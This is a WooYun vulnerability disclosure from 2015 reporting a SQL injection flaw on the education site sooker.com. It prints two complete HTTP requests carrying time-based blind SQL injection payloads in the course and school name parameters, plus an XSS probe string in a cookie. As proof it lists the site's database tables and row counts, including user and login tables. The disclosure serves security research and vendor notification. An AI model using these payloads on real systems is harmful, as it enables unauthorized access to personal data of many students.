搜课网SQL注入影响30万学生数据 | wooyun-2015-0144714| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144714

漏洞标题：搜课网SQL注入影响30万学生数据

漏洞作者：路人甲

提交时间：2015-10-04 23:36

修复时间：2015-11-18 23:38

公开时间：2015-11-18 23:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-04：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-11-18：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

冷

详细说明：

GET /index.php?act=clist&app=netschool&cate_id=5&course_name=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&price=4 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.sooker.com/
Cookie: SOOKER_ID=qt0cp925vavoobp1qroftfu6o1; Hm_lvt_e41b4b552f43a687801c48660b267965=1443837719,1443837719; Hm_lpvt_e41b4b552f43a687801c48660b267965=1443837719; BAIDU_DUP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); HMACCOUNT=D0C1E09A967EBCCE; BAIDUID=A40D88F89D1AF4FB5C85AB9DFC56E7FF:FG=1
Host: www.sooker.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

GET /index.php?act=clist&app=school&school_name=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.sooker.com/
Cookie: SOOKER_ID=qt0cp925vavoobp1qroftfu6o1; Hm_lvt_e41b4b552f43a687801c48660b267965=1443837719,1443837719; Hm_lpvt_e41b4b552f43a687801c48660b267965=1443837719; BAIDU_DUP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); HMACCOUNT=D0C1E09A967EBCCE; BAIDUID=A40D88F89D1AF4FB5C85AB9DFC56E7FF:FG=1
Host: www.sooker.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

漏洞证明：

Database: 51edu_ecmall
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| `51edu_zn_user_info` | 19253938 |
| `51edu_store_clickinfo` | 8676153 |
| `51edu_tj_course_views` | 6442506 |
| `51edu_2013_search_keyword` | 6074493 |
| `51edu_tj_store_views` | 3795169 |
| `51edu_store_corelative` | 1639335 |
| `51edu_menu_click` | 1212467 |
| `51edu_log_search` | 977307 |
| `51edu_zn_call_keyword` | 907364 |
| `51edu_search` | 551750 |
| `51edu_2012_course_type` | 546569 |
| `51edu_admin_log` | 485723 |
| `51edu_ip` | 440079 |
| `51edu_zn_400_log` | 382856 |
| `51edu_2012_course_comment` | 372802 |
| `51edu_course_keywords` | 325787 |
| `51edu_2012_course_area` | 319793 |
| `51edu_member` | 293432 |
| `51edu_2012_course2013_area` | 278948 |
| `51edu_zn_400_info` | 272779 |
| `51edu_zn_score` | 239596 |
| `51edu_zn_my_log` | 217864 |
| `51edu_zn_backclick` | 217261 |
| `51edu_course2011` | 212081 |
| `51edu_goods_fields` | 204738 |
| `51edu_goods` | 204737 |
| `51edu_course2011_bak` | 199010 |
| `51edu_school_login_info` | 178399 |
| `51edu_zn_400_callinfo` | 178363 |
| `51edu_score_detail_course` | 173597 |
| `51edu_school_login` | 148922 |
| `51edu_course` | 136904 |
| `51edu_400_realtime_log` | 104779 |
| `51edu_400_number` | 90000 |
| `51edu_uploaded_file` | 74427 |
| `51edu_news_content` | 73099 |
| `51edu_tj_course_info` | 72894 |
| `51edu_2012_order` | 60394 |
| `51edu_zn_agency_school` | 59549 |
| `51edu_zn_400_number_bak` | 59509 |
| `51edu_zn_bill` | 50234 |
| `51edu_store_area` | 48904 |
| `51edu_zm_demand` | 46333 |
| `51edu_course_page_keywords` | 40764 |
| `51edu_2012_school_cateintro` | 39246 |
| `51edu_2012_cart` | 37565 |
| `51edu_zn_tuijian_sms` | 36526 |
| `51edu_zn_sms` | 31652 |
| `51edu_2012_tj_school_category` | 29070 |
| `51edu_message` | 25214 |
| `51edu_store` | 24679 |
| `51edu_category_course` | 21355 |
| `51edu_2012_reglog` | 20899 |
| `51edu_user_priv` | 19465 |
| `51edu_zm_user_visit` | 18503 |
| `51edu_zn_store_extra` | 17752 |
| `51edu_zn_agency_bill` | 15708 |
| `51edu_zm_demand_school` | 14450 |
| `51edu_temp_400_history` | 14013 |
| `51edu_tj_store_calls` | 12988 |
| `51edu_sx_store_category` | 12112 |
| `51edu_goods_qa` | 12018 |
| `51edu_teacher` | 11870 |
| `51edu_zn_400_queue_bak` | 11289 |
| `51edu_zm_upgradeschool` | 11152 |
| `51edu_2012_school_stats` | 10024 |

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)